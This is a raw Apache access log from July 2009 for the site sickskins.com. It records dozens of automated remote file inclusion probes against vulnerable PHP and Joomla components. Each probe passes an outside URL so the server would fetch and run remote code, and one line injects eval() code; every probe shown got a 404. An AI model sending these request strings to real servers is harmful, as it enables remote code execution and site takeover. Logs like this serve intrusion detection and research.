80.248.208.177 - - [05/Jul/2009:09:45:12 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:45:12 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:45:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:47:45 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:47:45 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:09:47:46 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:54:26 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:09:56:58 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:20:52 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:20:52 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:20:52 -0700] "GET /logs/access.log%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:20:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:20:56 -0700] "GET /logs/access.log%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:20:57 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:10:24:39 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:24:54 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:24:54 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:24:54 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:25:09 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:25:09 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:25:09 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:26:25 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:26:25 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:26:25 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:26:29 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:26:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:26:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:27:21 -0700] "GET /logs/scripts.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:27:25 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:27:25 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:28:07 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
84.17.129.100 - - [05/Jul/2009:10:28:21 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:28:40 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:28:57 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:31:01 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:31:01 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:31:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:31:06 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:31:06 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:31:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
80.248.208.177 - - [05/Jul/2009:10:34:03 -0700] "GET /logs/access.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:34:12 -0700] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:10:34:35 -0700] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
94.23.2.21 - - [05/Jul/2009:10:39:39 -0700] "GET /logs/access.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:45:49 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:45:50 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "sickskins.com"
94.229.66.202 - - [05/Jul/2009:10:45:52 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "sickskins.com"
217.16.16.206 - - [05/Jul/2009:10:47:56 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.16.16.206 - - [05/Jul/2009:10:48:09 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.16.16.206 - - [05/Jul/2009:10:48:17 -0700] "GET /logs/access.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.169.210.130 - - [05/Jul/2009:10:52:07 -0700] "GET /logs/access.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sickskins.com"
217.169.210.130 - - [05/Jul/2009:10:52:07 -0700] "GET /images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sickskins.com"
217.169.210.130 - - [05/Jul/2009:10:52:08 -0700] "GET /logs/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sickskins.com"
79.148.238.69 - - [05/Jul/2009:11:10:06 -0700] "GET /logs/access.log/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
79.148.238.69 - - [05/Jul/2009:11:10:07 -0700] "GET /images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
79.148.238.69 - - [05/Jul/2009:11:10:07 -0700] "GET /logs/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
69.65.41.165 - - [05/Jul/2009:11:13:45 -0700] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sickskins.com"
69.65.41.165 - - [05/Jul/2009:11:13:49 -0700] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sickskins.com"
69.65.41.165 - - [05/Jul/2009:11:15:26 -0700] "GET /logs/access.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sickskins.com"
71.132.145.194 - - [05/Jul/2009:11:27:24 -0700] "GET /logs/scripts.log HTTP/1.1" 200 621337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sickskins.com"
217.64.195.223 - - [05/Jul/2009:11:32:51 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
217.64.195.223 - - [05/Jul/2009:11:32:52 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
217.64.195.223 - - [05/Jul/2009:11:32:52 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
217.64.195.223 - - [05/Jul/2009:11:32:54 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
217.64.195.223 - - [05/Jul/2009:11:32:54 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
217.64.195.223 - - [05/Jul/2009:11:32:54 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "sickskins.com"
211.189.39.159 - - [05/Jul/2009:11:32:55 -0700] "GET /logs/access.log//ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
211.189.39.159 - - [05/Jul/2009:11:32:55 -0700] "GET /ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
211.189.39.159 - - [05/Jul/2009:11:32:55 -0700] "GET /logs//ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.169.210.130 - - [05/Jul/2009:11:34:18 -0700] "GET /logs/scripts.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sickskins.com"
82.151.132.176 - - [05/Jul/2009:11:36:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
82.151.132.176 - - [05/Jul/2009:11:36:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
82.151.132.176 - - [05/Jul/2009:11:36:45 -0700] "GET /logs/scripts.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
217.16.16.206 - - [05/Jul/2009:11:37:37 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.16.16.206 - - [05/Jul/2009:11:37:54 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.16.16.206 - - [05/Jul/2009:11:38:07 -0700] "GET /logs/access.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
82.151.132.176 - - [05/Jul/2009:11:38:32 -0700] "GET /logs/scripts.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.197.183.21 - - [05/Jul/2009:11:46:14 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.197.183.21 - - [05/Jul/2009:11:46:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.197.183.21 - - [05/Jul/2009:11:46:14 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:11:47:48 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:11:47:48 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:11:47:50 -0700] "GET /logs/access.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
66.197.183.21 - - [05/Jul/2009:11:48:28 -0700] "GET /logs/access.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
62.16.115.69 - - [05/Jul/2009:11:50:43 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
62.16.115.69 - - [05/Jul/2009:11:50:43 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
62.16.115.69 - - [05/Jul/2009:11:50:43 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
62.16.115.69 - - [05/Jul/2009:11:53:25 -0700] "GET /logs/access.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
88.191.37.60 - - [05/Jul/2009:11:55:15 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sickskins.com"
38.103.63.61 - - [05/Jul/2009:11:58:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sickskins.com"